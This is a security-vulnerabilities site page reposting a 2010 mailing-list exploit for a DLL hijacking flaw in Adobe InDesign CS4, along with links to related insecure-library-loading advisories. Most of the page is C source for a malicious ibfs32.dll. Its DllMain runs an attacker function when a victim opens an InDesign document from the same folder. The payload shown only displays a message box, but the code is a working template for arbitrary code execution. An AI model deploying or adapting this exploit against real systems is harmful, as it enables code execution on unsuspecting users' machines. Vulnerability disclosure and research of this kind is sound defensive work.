Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Microsoft Windows multiple applications DLL hijacking

  ESA-2011-039: RSA(r), The Security Division of EMC, announces security fixes and improvements for RSASecurID(r)
Software Token 4.1 for Microsoft(r)W
indows(r)

  Foxit Reader Insecure Library Loading

  PDFill Insecure Library Loading

  Silently Pwning Protected-Mode IE9 and Innocent Windows Applications

From:glafkos_(at)_astalavista.com <glafkos_(at)_astalavista.com>
Date:26.08.2010
Subject:Adobe InDesign CS4 DLL Hijacking Exploit (ibfs32.dll)

/*
Exploit Title: Adobe InDesign CS4 DLL Hijacking Exploit (ibfs32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: CS4 v6.0
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .indl .indp .indt .inx
Greetz: Astalavista, OffSEC, Exploit-DB
*/

#include <windows.h>

BOOL WINAPI DllMain (
           HANDLE    hinstDLL,
           DWORD     fdwReason,
           LPVOID    lpvReserved)
{
   switch (fdwReason)
       {
       case DLL_PROCESS_ATTACH:
               dll_hijack();
       case DLL_THREAD_ATTACH:
       case DLL_THREAD_DETACH:
       case DLL_PROCESS_DETACH:
       break;
       }
       return TRUE;
}

int dll_hijack()
{
 MessageBox(0, "Adobe DLL Hijacking!", "DLL Message", MB_OK);
}

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru